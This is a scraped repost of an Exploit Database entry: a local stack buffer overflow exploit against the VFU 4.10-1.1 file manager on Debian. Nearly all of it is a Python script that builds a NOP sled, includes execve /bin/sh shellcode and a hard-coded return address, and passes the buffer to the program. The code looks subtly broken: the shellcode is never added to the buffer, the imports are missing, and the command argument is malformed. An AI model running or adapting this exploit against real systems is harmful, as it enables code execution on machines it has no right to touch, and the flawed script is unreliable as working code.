VFU 4.10-1.1 – Local Buffer Overflow

• Exploit Database
• 14 阅读

• 作者： Juan Sacco
  日期： 2014-12-03
• 类别：

  • local
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/35450/

• # Exploit Author: Juan Sacco - http://www.exploitpack.com
  <jsacco@exploitpack.com>
  # Tested on: GNU/Linux - Debian Wheezy
  # Description: VFU v4.10-1.1 is prone to a stack-based buffer overflow
  # vulnerability because the application fails to perform adequate
  # boundary-checks on user-supplied input.
  #
  # An attacker can exploit this issue to execute arbitrary code in the
  # context of the application. Failed exploit attempts will result in a
  # denial-of-service condition.
  #
  # Vendor homepage: VFU v4.10-1.1 ( Latest version ) -
  http://cade.datamax.bg/vfu/
  # Debian package: https://packages.debian.org/wheezy/vfu
  
  buffersize =803
  nopsled = "\x90"
  shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
  eip = "\x10\xf0\xff\xbf"
  buffer = nopsled * (buffersize-len(shellcode)) + eip
  
  try:
   subprocess.call(["vfu -d", buffer])
  except OSError as e:
   if e.errno == os.errno.ENOENT:
   print "VFU not found!"
   else:
   print "Error executing exploit"
   raise